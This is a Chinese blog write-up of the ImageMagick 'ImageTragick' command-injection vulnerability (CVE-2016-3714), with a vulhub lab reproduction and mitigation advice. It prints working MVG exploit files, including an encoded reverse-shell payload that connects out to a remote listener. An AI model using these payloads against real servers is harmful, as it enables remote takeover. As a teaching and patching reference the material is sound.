Imagemagick 命令注入漏洞(CVE-2016-3714)

最新推荐文章于 2025-04-23 09:19:45 发布
最新推荐文章于 2025-04-23 09:19:45 发布
阅读量819 收藏 18
点赞数 13
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Palpitate_LL/article/details/146371541
版权

漏洞介绍

漏洞名称:Imagemagick 命令注入漏洞(CVE-2016-3714)

漏洞定级:高危

漏洞描述:ImageMagick 在处理恶意构造的图片文件时,对于文件中的 URL 未经严格过滤,可导致命令注入漏洞。通过命令注入漏洞,黑客可以在服务器上执行任意系统命令,获取服务器权限。

影响范围:ImageMagick 6.9.3-9本身及以前所有版本

漏洞原理

ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。

但有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。

国外的安全人员为此新建了一个网站:https://imagetragick.com/

与这个漏洞相关的CVE有CVE-2016-3714、CVE-2016-3715、CVE-2016-3716、CVE-2016-3717,

其中最严重的就是CVE-2016-3714,利用这个漏洞可以造成远程命令执行的危害。

ImageMagick有一个功能叫做delegate(委托),作用是调用外部的lib来处理文件。而调用外部lib的过程是使用系统的system命令来执行的

参考代码:
https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L347

我们在ImageMagick的默认配置文件里可以看到所有的委托:
/etc/ImageMagick/delegates.xml 漏洞报告中给出的POC是利用了如下的这个委托:

 

它在解析https图片的时候,使用了curl命令将其下载,我们看到%M被直接放在curl的最后一个参数内。
 

ImageMagick默认支持一种图片格式,叫mvg,而mvg与svg格式类似,其中是以文本形式写入矢量图的内容,而这其中就可以包含https处理过程。
 

所以我们可以构造一个.mvg格式的图片(但文件名可以不为.mvg,比如下图中包含payload的文件的文件名为vul.gif,而ImageMagick会根据其内容识别为mvg图片),并在https://后面闭合双引号,写入自己要执行的命令:
 

push graphic-context
viewbox 0 0 640 480
fill ‘url(https://"|id; ")’
pop graphic-context
 

这样,ImageMagick在正常执行图片转换、处理的时候就会触发漏洞。
 

漏洞复现
 

 
 
参考链接:
 https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick
 

 

使用vulhub靶场进行复现
 

进入目录:
 

 

启动靶场环境:
 

docker-compose up -d
 

 

访问靶场环境
 

 

上传poc,新建一个txt文件,内容为:
 

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|id; ")'
pop graphic-context
 

将文件保存为poc.gif
 

 

上传poc.gif,点击提交,成功执行:
 

 

反弹shell POC:
 

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguODEuMjMyLzg4ODggMD4mMQ== | base64 -d | bash`"||id " )'
pop graphic-context
 

 

攻击机进行监听
 

 

上传 poc1.gif ,执行成功
 

 

 

【——全网最全的网络安全学习资料包分享给爱学习的你,关注我,私信回复“资料领取”获取——】
 1.网络安全多个方向学习路线2.全网最全的CTF入门学习资料3.一线大佬实战经验分享笔记4.网安大厂面试题合集5.红蓝对抗实战技术秘籍6.网络安全基础入门、Linux、web安全、渗透测试方面视频
 

 

漏洞修复
 

关于这个漏洞影响ImageMagick 6.9.3-9以前是所有版本,包括ubuntu源中安装的ImageMagick。而官方在6.9.3-9版本中对漏洞进行了不完全的修复。所以,我们不能仅通过更新ImageMagick的版本来杜绝这个漏洞。
 

现在,我们可以通过如下两个方法来暂时规避漏洞:
 

  1. 处理图片前,先检查图片的 magic bytes,也就是图片头,如果图片头不是你想要的格式,那么就不调用ImageMagick处理图片。如果你是php用户,可以使用getimagesize函数来检查图片格式,而如果你是wordpress等web应用的使用者,可以暂时卸载ImageMagick,使用php自带的gd库来处理图片。
  2. 使用policy file来防御这个漏洞,这个文件默认位置在 /etc/ImageMagick/policy.xml ,我们通过配置如下的xml来禁止解析https等敏感操作:
 

参考链接
 

https://www.cnblogs.com/bmjoker/p/9898590.html
 

https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick
 

https://mp.weixin.qq.com/s/q6jlnlU-hoRkr-vOJUp4LQ

                

        

    

  



    



                



	

		

			

				
					
Jarvis March算法详解及Python实现(附设计模式案例)

				
			

			

				

					qq_42568323的博客
				

				

					11-16
					
					436
					
				

			

		

		

			
				
Jarvis March算法,又称Gift Wrapping算法,是一种计算二维平面点集凸包算法凸包是一个点集中最外层点的集合,它形成了一个凸多边形,包围着所有的点。在凸包计算中,不同的排序策略可能对性能有显著影响。例如,我们可能需要按角度或按距离对点排序。使用策略模式可以灵活切换排序方式。本文详细介绍了Jarvis March算法的原理及其Python实现,并结合观察者模式策略模式和命令模式等设计模式,展示了如何在实际应用中提高算法的灵活性和效率。

			
		

	



                

            
              



	

		

			

				
					
凸包JarvisMarch算法java实现

				
			

			

				

					09-24
				

			

		

		

			
				
我个人用java写的关于凸包JarvisMarch算法,也称gift wrapping算法。比较完美,算法的实现很简洁,只有加减乘除的基本运算,程序运行效率很高,计算10万个点的运行时间大概20秒左右。适当增加Point类中的屏幕范围,可以实现更多的点的运算。将x,y修改成double类型可以获得更多。代码量不多,所有没写什么注释,这本来就是为完成作业而仓促而就,文件里有6个测试类,看看基本就明白该怎么用了。借鉴了一些网上的代码,原作者现在也找不到名字了,在此一并致谢。

			
		

	



              


  
              

                


	

		

			

				
					
构造凸包-Jarvis March(Gift Wrapping)算法

				
			

			

				

					longlongqin的博客
				

				

					03-14
					
					474
					
				

			

		

		

			
				
回顾凸包构造算法:极点法、极边法和增量构造法,其复杂度分别为O(n^4^)、O(n^3^)和O(n^2^),效率经过优化已经大大提高了。接下来引入一种新的算法——Jarvis March,其复杂度也是O(n^2^),但是相较于增量构造在最好情况下效率是较高的。实现策略先想一下为何极边法复杂度高达O(n^3^)。实际上我们要对点集中所有边进行遍历,这需要n^2^复杂度,然后对每个边进行鉴别,又需要n...

			
		

	





	

		

			

				
					
jarvis:智能生活管理助手

					
最新发布

				
			

			

				

					gitblog_01007的博客
				

				

					04-23
					
					591
					
				

			

		

		

			
				
jarvis:智能生活管理助手

    
        
            jarvis
            A command-line personal assistant that integrates with Google Calendar, Gmail, and Tasks to help manage your digital life.
            
  ...

			
		

	



		

			
		



	

		

			

				
					
Jarvis步进法(Jarvis March凸包算法

				
			

			

				

					言午日月
				

				

					01-10
					
					1132
					
				

			

		

		

			
				
这样可以确保在构建的凸包上,点的极角是递增的,最终形成一个逆时针方向的凸多边形。算法的时间复杂度主要取决于对点的排序操作,通常为O(n log n),其中n是点的数量。从点集中选择一个起始点,然后在每一步中选择下一个顶点,该顶点是当前点集中与当前点形成的线段上,极角最小的点。扫描过程: 从起始点开始,选择当前点(假设为p),然后选择下一个点(假设为q),这个点是当前点p与其他点形成的线段上,极角最小的点。选择起始点的过程可以通过遍历点集,找到y坐标最小的点,并在y坐标相同时,选择x坐标最小的点。

			
		

	





	

		

			

				
					
Convex Hull:O(h*n)算法 Jarvis March

				
			

			

				

					sherlockreal的博客
				

				

					06-23
					
					803
					
				

			

		

		

			
				
课程:计算几何

书籍:计算几何算法与应用



Jarvis March算法也是一种递增式的思路。以极边的一个端点为起点,来查找另一条极边。以此进行下去,最后构成一个环路时(极点的末端等于最初的起始端点)。凸包构造结束。

关于以一个极边为起始点的一天极边。可以用ToLeft测试进行比较,就如同O(n^2)中对点集逆时针排序那样。

关于如何确定起始点,我们选取字典序最小的点作为起始点(Y值最...

			
		

	





	

		

			

				
					
凸包算法Jarvis's march步进法和Graham扫描法的原理及实现

				
			

			

				

					沉默、凝视的博客
				

				

					11-10
					
					1781
					
				

			

		

		

			
				
凸包概念


在二维欧几里得空间中,凸包可想象为一条刚好包著所有点的橡皮圈。
    用自己的话说就是在一个点集中,能够包含所有点的凸多边形(所有的点都能落入多边形的内部)。专业的描述可以通过百度百科了解。在作者Kyle Loudon的《Mastering Algorithms with C》一书的中文版中描述到一个点集的凸包是指包含该点集中的所有点的最小凸多边形。如果一个多边形内任意两...

			
		

	





	

		

			

				
					
计算几何基础:凸包与多边形面积计算

				
			

			

				

					
				

			

		

		

			
				
计算几何中,求解凸包有多种算法,如格拉姆-施密特(Graham's Scan)、 Jarvis March 或者 Andrew's Monotone Chain 算法。这些算法用于找出一组点集的最小凸多边形,常用于图形学、机器学习、数据挖掘等领域。  在...

			
		

	





	

		

			

				
					
Java实现高效的JarvisMarch凸包算法

				
			

			

				

					
				

			

		

		

			
				
凸包问题有多种算法解决,而Jarvis March算法,也被称为礼物包裹算法,是一种直观且高效的算法来寻找给定点集的凸包。在这个算法中,算法会沿着凸包的边缘行进,最终形成一个闭合的多边形。  Jarvis March算法的基本...

			
		

	





	

		

			

				
					
【点集算法凸包Jarvis步进法:另一种凸包构造算法及其优化

				
			

			

				

					
				

			

		

		

			
				
[【点集算法凸包Jarvis步进法:另一种凸包构造算法及其优化](https://media.geeksforgeeks.org/wp-content/uploads/20231218125128/Convex-Hull-using-Jarvis-Algorithm-or-Wrapping.jpg) # 1. 点集算法凸包...

			
		

	





	

		

			

				
					
计算几何入门算法与应用指南

				
			

			

				

					
				

			

		

		

			
				
求解凸包算法,如 Gift WrappingJarvis March)或 Graham's Scan,是计算几何中的重要算法,常用于优化问题和数据结构构建。  5. **多边形和圆的关系**:如判断点、线段、折线、矩形是否在多边形或圆内,以及...

			
		

	





	

		

			

				
					
Graham Jarvis两种算法求散点集凸包

				
			

			

				

					01-16
				

			

		

		

			
				
本文参考自<>章节33.3 寻找凸包,用C++实现了,Grahan和Jarvis两种算法求平面散点集的凸包,注释详细,代码精简,并用OpenGL绘制出所求结果予以验证.

			
		

	





	

		

			

				
					
凸包算法 Jarvis GrahamScan 两种算法对比

				
			

			

				

					09-02
				

			

		

		

			
				
两种凸包算法 算法导论的详细实现 C++ VS2008

			
		

	





	

		

			

				
					
凸包的几种常见解法Jarvis march Graham Scan

				
			

			

				

					08-18
				

			

		

		

			
				
定义 点集Q的凸包(convex hull)是指一个最小凸多边形,满足Q中的点或者在多边形边上或者在其内。下图中由红色线段表示的多边形就是点集Q={p0,p1,...p12}的凸包

			
		

	





	

		

			

				
					
凸包JarvisMarch算法——Java语言

				
			

			

				

					Langley
				

				

					03-02
					
					2072
					
				

			

		

		

			
				
public class JarvisMarch{

	private List points;
	private List hull;
	private static int MAX_ANGLE = 4;   
	private double currentMinAngle = 0;

	public JarvisMarch(List points)  {
		this.points = poi

			
		

	





	

		

			

				
					
2D凸包算法(一):Jarvis' MarchGift Wrapping Algorithm )

				
			

			

				

					shungry的博客
				

				

					02-16
					
					3207
					
				

			

		

		

			
				
JarvisMarch 图示

先从一个凸包上的顶点开始,顺着外围绕一圈。
每当寻找下一个要被包围的点,则遍历平面上所有点,找出最外围的一点来包围。可以利用叉积运算来判断。

时间复杂度为 O(NM) , N 为所有点的数目, M 为凸包的顶点数目。


具体思想:

先确定边界上的点v1和与下一个点v2
在点集里去寻找下一个点v3,使得v1 v3 v2满足CCW
如果满足,这就说明v3是更外...

			
		

	





	

		

			

				
					
计算几何初步-凸包-Jarvis步进法。】【HDU1392】Surround the Trees

				
			

			

				

					weixin_34190136的博客
				

				

					11-27
					
					241
					
				

			

		

		

			
				
【科普】什么是BestCoder?如何参加?





Surround the Trees
Time Limit: 2000/1000 MS (Java/Others)Memory Limit: 65536/32768 K (Java/Others)
Total Submission(s): 8113Accepted Submiss...

			
		

	





	

		

			

				
					
计算几何入门 1.2:凸包构造——极点法和极边法

				
			

			

				

					Housz的博客
				

				

					02-04
					
					4465
					
				

			

		

		

			
				
一、极点(extreme point)

继续考虑钉子与橡皮筋的例子。我们可以发现边缘上的钉子是对范围圈定“有贡献”的,而范内部的的钉子对范围圈定是“没有贡献的”。这只是直观的结论,严谨考虑我们将其抽象为极性与极点的概念。



简单的数学前提:过一个点有无数直线;有向直线可以将平面划分确定的左右两部分;

可以在图像上表示为:



可以发现,边缘上“有贡献”的钉子,总可以找到一条穿过它的有向...

			
		

	





	

		

			

				
					
计算几何——凸包构造算法

				
			

			

				

					giraffe1997的博客
				

				

					07-01
					
					924
					
				

			

		

		

			
				
本文一共总结了凸包构造的四种算法:Incremental Construction、Jarvis步进法、Graham Scan和Divide-And-Conquer        就像插入排序一样,每次选一个不在凸包集合内的点加入,判断加入的点是否影响凸包极点(边界点)的size,若加入的点使得size变化或边界集合改变,则调整,如下图6,7,9所示。先对多边形进行一个“预处理”,给每个点按序编号,类比有序向量二分查找的思想,来逐步缩小规模。如下图:        首先任选一点为基准点(蓝色点),然后用二分

			
		

	





	

		

			

				
					
终止代码:DRIVER_IRQL_NOT_LESS_OR_EQUAL 失败的操作 ACE GAME.sys

				
			

			

				

					03-27
				

			

		

		

			
				
### 解决 DRIVER_IRQL_NOT_LESS_OR_EQUAL 蓝屏错误的方法

DRIVER_IRQL_NOT_LESS_OR_EQUAL 是一种常见的蓝屏错误,通常表明某个驱动程序尝试访问受保护的内存区域。这种问题可能由多种原因引起,包括硬件故障、不兼容的驱动程序或系统文件损坏。

以下是针对该问题的具体解决方案:

#### 1. 运行系统诊断工具
运行计算机制造商提供的所有系统诊断软件,特别是用于检测内存问题的工具[^1]。这些工具可以帮助识别是否存在物理内存(RAM)或其他硬件组件的问题。

#### 2. 禁用或移除最近安装的硬件或软件
如果近期安装了新的硬件设备(如 RAM 或适配器),或者更新了某些驱动程序或软件,则建议暂时禁用或卸载它们以排除潜在冲突。可以通过以下方式操作:
- **进入设备管理器**:按 `Win + X` 并选择“设备管理器”。
- 找到并右键单击可疑硬件设备,选择“禁用设备”或“卸载设备”。

#### 3. 更新或回滚驱动程序
确保所有驱动程序均为最新版本。对于特定引发问题的 `.sys` 文件(如 ACE GAME.sys),可以尝试将其替换为旧版稳定驱动程序:
```cmd
devmgmt.msc
```
打开设备管理器后定位对应的驱动程序,右键点击并选择“属性”,然后切换至“驱动程序”选项卡,执行“回滚驱动程序”命令。

#### 4. 使用安全模式启动
通过 Windows 安全模式启动系统有助于隔离可能导致问题的应用程序和服务。具体步骤如下:
- 启动时反复按下 F8 键直到显示高级引导菜单。
- 选择“带网络的安全模式”以便进一步排查问题。

#### 5. 检查事件查看器日志
Windows 的事件查看器能够提供有关崩溃更详细的记录信息:
```cmd
eventvwr.msc
```
导航至“Windows 日志 -> 系统”,查找带有错误状态的日志条目,重点关注描述部分提到的内容及其关联模块名称。

#### 6. 执行 SFC 和 DISM 工具修复系统文件
利用内置命令扫描并修正受损的操作系统核心文件:
```cmd
sfc /scannow
DISM.exe /Online /Cleanup-image /Restorehealth
```

以上措施综合应用可有效减少乃至彻底消除此类 BSOD 故障的发生概率。

---

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值